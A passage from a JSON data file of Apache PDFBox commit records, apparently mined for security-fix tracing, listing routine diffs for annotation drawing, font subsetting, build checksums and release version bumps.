a/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java", - "@@ -192,6 +192,2 @@ public class CreateSignature implements SignatureInterface", - " {", - "- if (randomAccessFile!= null) ", - "- {", - "- randomAccessFile.close();", - "- }", - " if (scratchFile != null && scratchFile.exists() && !scratchFile.delete())" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "069984d3b643657dbf757037f1ab4f5041466a47", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527329478, - "hunks": 1, - "message": "PDFBOX-3353: remove unused assignment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832302 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "index 75fd04e72..6738ed733 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "@@ -94,3 +94,3 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", - "- PDRectangle borderBox = null;", - "+ PDRectangle borderBox;", - " float[] rectDifferences = annotation.getRectDifferences();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "177005340033939c891927edc0b0b3daa4a07289", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523900550, - "hunks": 4, - "message": "PDFBOX-4142: omit md5 checksums, replace SHA-1 with SHA-512, adjust text git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829304 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pom.xml b/pom.xml", - "index 5b96d706f..71f4fcc77 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -116,3 +116,3 @@", - " ", - "- ", - "+ ", - " ", - "@@ -122,9 +122,3 @@", - " ", - "- ", - "- ", - "- ", - "- ", - "- ", - "- ", - "- ", - "+ ", - " ", - "@@ -142,3 +136,3 @@ The release candidate is a zip archive of the sources in:", - "-The SHA1 checksum of the archive is ${checksum}.", - "+The SHA-512 checksum of the archive is ${checksum}.", - "@@ -157,2 +151,6 @@ The release candidate has been prepared in:", - "+Please commit it to", - "+", - "+ https://dist.apache.org/repos/dist/dev/pdfbox/${project.version}/", - "+", - " A release vote template has been generated for you:" - ], - "changed_files": [ - "pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4142": "", - "SHA-1": "", - "SHA-512": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.14", - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4142, SHA-1, SHA-512", - "relevance": 2 - } - ] - }, - { - "commit_id": "3d42684056f8af17fef18b23aaf3e31382d3cd6f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530634795, - "hunks": 2, - "message": "PDFBOX-3353: forgot to close path; increase rectangle padding like Adobe does git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835003 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "index 29730a10b..7b4c99e31 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "@@ -87,4 +87,4 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - "- rect.setLowerLeftX(Math.min(minX - lineWidth / 2, rect.getLowerLeftX()));", - "- rect.setLowerLeftY(Math.min(minY - lineWidth / 2, rect.getLowerLeftY()));", - "+ rect.setLowerLeftX(Math.min(minX - lineWidth, rect.getLowerLeftX()));", - "+ rect.setLowerLeftY(Math.min(minY - lineWidth, rect.getLowerLeftY()));", - " rect.setUpperRightX(Math.max(maxX + lineWidth, rect.getUpperRightX()));", - "@@ -156,2 +156,3 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "+ contentStream.closePath();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "a2f44d980e065c4f66004b5ac0711b309af58cec", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525908281, - "hunks": 1, - "message": "PDFBOX-4189: bug fix - subset is empty if both id sets are empty git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831290 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "index 1e7b4880a..391983452 100755", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", - "@@ -992,3 +992,3 @@ public final class TTFSubsetter", - " {", - "- if (glyphIds.isEmpty() || uniToGID.isEmpty())", - "+ if (glyphIds.isEmpty() && uniToGID.isEmpty())", - " {" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "acf2c2cca7335881a95e09b16510b01a60426677", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524336082, - "hunks": 2, - "message": "PDFBOX-4071: add override, improve message git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829740 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java", - "index 181b71753..da39b607f 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java", - "@@ -49,2 +49,3 @@ public class IndexToLocationTable extends TTFTable", - " */", - "+ @Override", - " public void read(TrueTypeFont ttf, TTFDataStream data) throws IOException", - "@@ -66,3 +67,3 @@ public class IndexToLocationTable extends TTFTable", - " {", - "- throw new IOException( \"Error:TTF.loca unknown offset format.\");", - "+ throw new IOException( \"Error:TTF.loca unknown offset format: \" + head.getIndexToLocFormat());", - " }" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "c43f4b2a31b375bce61aef3845138998c543ad55", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532781393, - "hunks": 1, - "message": "PDFBOX-4281: remove Apache Wink dependency, add class from Apache Wink + dependencies git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836896 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index c270176a5..bf47f5026 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -87,5 +87,11 @@", - " ", - "- org.apache.wink", - "- wink-component-test-support", - "- 1.4", - "+ javax.servlet", - "+ javax.servlet-api", - "+ 4.0.1", - "+ test", - "+ ", - "+ ", - "+ org.apache.geronimo.specs", - "+ geronimo-jaxrs_1.1_spec", - "+ 1.0", - " test" - ], - "changed_files": [ - "examples/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4281": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4281", - "relevance": 2 - } - ] - }, - { - "commit_id": "c3821388a0da6f86915aa96b1a8cebc605e6c167", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528569477, - "hunks": 4, - "message": "PDFBOX-3353: support /Cross git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833247 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "index 7311feaec..6d234de46 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "@@ -76,2 +76,7 @@ public class PDAnnotationText extends PDAnnotationMarkup", - "+ /**", - "+ * Constant for the name of a cross annotation.", - "+ */", - "+ public static final String NAME_CROSS = \"Cross\";", - "+", - " /**", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 5e0241496..aeaf70abe 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -55,2 +55,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", - "+ !PDAnnotationText.NAME_CROSS.equals(annotation.getName()) &&", - " !PDAnnotationText.NAME_CIRCLE.equals(annotation.getName()))", - "@@ -86,2 +87,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "+ case PDAnnotationText.NAME_CROSS:", - "+ drawCross(contentStream, bbox);", - "+ break;", - " case PDAnnotationText.NAME_CIRCLE:", - "@@ -171,2 +175,33 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private void drawCross(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ throws IOException", - "+ {", - "+ // should be a square, but who knows...", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ // small = offset nearest bbox edge", - "+ // large = offset second nearest bbox edge", - "+ float small = min / 10;", - "+ float large = min / 5;", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+", - "+ contentStream.moveTo(small, large);", - "+ contentStream.lineTo(large, small);", - "+ contentStream.lineTo(min / 2, min / 2 - small);", - "+ contentStream.lineTo(min - large, small);", - "+ contentStream.lineTo(min - small, large);", - "+ contentStream.lineTo(min / 2 + small, min / 2);", - "+ contentStream.lineTo(min - small, min - large);", - "+ contentStream.lineTo(min - large, min - small);", - "+ contentStream.lineTo(min / 2, min / 2 + small);", - "+ contentStream.lineTo(large, min - small);", - "+ contentStream.lineTo(small, min - large);", - "+ contentStream.lineTo(min / 2 - small, min / 2);", - "+ contentStream.closeAndFillAndStroke();", - "+ }", - "+", - " @Override" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "00f3aa4521b300057238ed418ad957c2f4118065", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527269236, - "hunks": 3, - "message": "PDFBOX-4189: Sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832255 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "index 8fa6c9337..39c5bbae2 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -210,7 +210,6 @@ public class BengaliPdfGenerationHelloWorld", - "- if (line.startsWith(\"#\"))", - "+ if (!line.startsWith(\"#\"))", - " {", - "- continue;", - "+ lines.add(line);", - " }", - "- lines.add(line);", - " }" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "5ef99ad81b8d020c710511954e29a42e05fe2dcb", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527269108, - "hunks": 1, - "message": "PDFBOX-3353: remove double code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832254 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index ebfa3b402..d9ae0fbe8 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -103,3 +103,2 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - "- cs.setStrokingColor(color);", - " if (ab.dashArray != null)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "a93450cfcae7ff12faccbf1df2a4f0e4557622c3", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528130277, - "hunks": 2, - "message": "PDFBOX-4071: remove unused assignment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832870 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "index df9dd603b..8c5effaf8 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "@@ -231,3 +231,3 @@ public class PlainTextFormatter", - " {", - "- float wordWidth = 0f;", - "+ float wordWidth;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", - "index 0fa2d5ee6..efa7741d1 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", - "@@ -231,3 +231,3 @@ class PlainTextFormatter", - " {", - "- float wordWidth = 0f;", - "+ float wordWidth;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "aa56c9446e681fb243cd0db198a590320d7fdf49", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524836229, - "hunks": 3, - "message": "PDFBOX-4189: fix SonarQube pet peeve (variable hides a field) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830353 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "index 7c9feaefb..396a9b549 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "@@ -204,3 +204,3 @@ public class GsubWorkerForBengali implements GsubWorker", - " {", - "- Map beforeAndAfterSpanGlyphIds = new HashMap<>();", - "+ Map result = new HashMap<>();", - "@@ -208,3 +208,3 @@ public class GsubWorkerForBengali implements GsubWorker", - " {", - "- beforeAndAfterSpanGlyphIds.put(", - "+ result.put(", - " getGlyphId(beforeAndAfterSpanComponent.originalCharacter),", - "@@ -213,3 +213,3 @@ public class GsubWorkerForBengali implements GsubWorker", - "- return Collections.unmodifiableMap(beforeAndAfterSpanGlyphIds);", - "+ return Collections.unmodifiableMap(result);", - " }" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "161d67f7108b7abda85aab397b236258a3502889", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523896912, - "hunks": 1, - "message": "prepare for 1.8.14 release git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829296 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/build.xml b/pdfbox/build.xml", - "index ed22180c9..0fb2d4c9b 100644", - "--- a/pdfbox/build.xml", - "+++ b/pdfbox/build.xml", - "@@ -30,3 +30,3 @@", - "- ", - "+ " - ], - "changed_files": [ - "pdfbox/build.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.14", - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [] - }, - { - "commit_id": "a2fd9e2c9fa60c4cd46306a28fa95f93dc1fb604", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529348901, - "hunks": 16, - "message": "[maven-release-plugin] prepare release 2.0.10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833753 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/app/pom.xml b/app/pom.xml", - "index d9f8855bf..e5adcbef9 100644", - "--- a/app/pom.xml", - "+++ b/app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/debugger-app/pom.xml b/debugger-app/pom.xml", - "index 71eb1798f..acf31fc39 100644", - "--- a/debugger-app/pom.xml", - "+++ b/debugger-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/debugger/pom.xml b/debugger/pom.xml", - "index 7f03b7cdf..6faddeccd 100644", - "--- a/debugger/pom.xml", - "+++ b/debugger/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index b641d1be1..3e199a72e 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 38b9b380f..ffa689b1c 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 74dfe953b..7200d42ef 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -31,3 +31,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " pom", - "@@ -429,5 +429,5 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", - "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", - "- http://svn.apache.org/viewvc/maven/pom/branches/2.0/pdfbox-parent", - "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/2.0.10/pdfbox-parent", - "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/2.0.10/pdfbox-parent", - "+ http://svn.apache.org/viewvc/maven/pom/tags/2.0.10/pdfbox-parent", - " ", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 1d8bd38d8..4cf0b1940 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/pom.xml b/pom.xml", - "index 491ec68a9..01fe29b31 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " parent/pom.xml", - "@@ -36,8 +36,8 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/2.0", - "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/2.0.10", - " ", - " ", - "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/2.0", - "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/2.0.10", - " ", - "- http://svn.apache.org/viewvc/pdfbox/branches/2.0", - "+ http://svn.apache.org/viewvc/pdfbox/tags/2.0.10", - " ", - "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", - "index 84d52213d..00b67fe2d 100644", - "--- a/preflight-app/pom.xml", - "+++ b/preflight-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index 5e8d7c775..8b73fde57 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -28,3 +28,3 @@", - " \t\tpdfbox-parent", - "-\t\t2.0.10-SNAPSHOT", - "+\t\t2.0.10", - " \t\t../parent/pom.xml", - "diff --git a/tools/pom.xml b/tools/pom.xml", - "index 37f81352e..d7f038039 100644", - "--- a/tools/pom.xml", - "+++ b/tools/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.10-SNAPSHOT", - "+ 2.0.10", - " ../parent/pom.xml", - "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", - "index c365bee98..aba5ad314 100644", - "--- a/xmpbox/pom.xml", - "+++ b/xmpbox/pom.xml", - "@@ -29,3 +29,3 @@", - " \t\tpdfbox-parent", - "-\t\t2.0.10-SNAPSHOT", - "+\t\t2.0.10", - " \t\t../parent/pom.xml" - ], - "changed_files": [ - "app/pom.xml", - "debugger-app/pom.xml", - "debugger/pom.xml", - "examples/pom.xml", - "fontbox/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "pom.xml", - "preflight-app/pom.xml", - "preflight/pom.xml", - "tools/pom.xml", - "xmpbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [] - }, - { - "commit_id": "898aa0f4b8d5fe94dd84961dba59c5d08c2be600", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529948694, - "hunks": 0, - "message": "[maven-release-plugin] copy for tag 1.8.15 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/1.8.15@1834352 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": 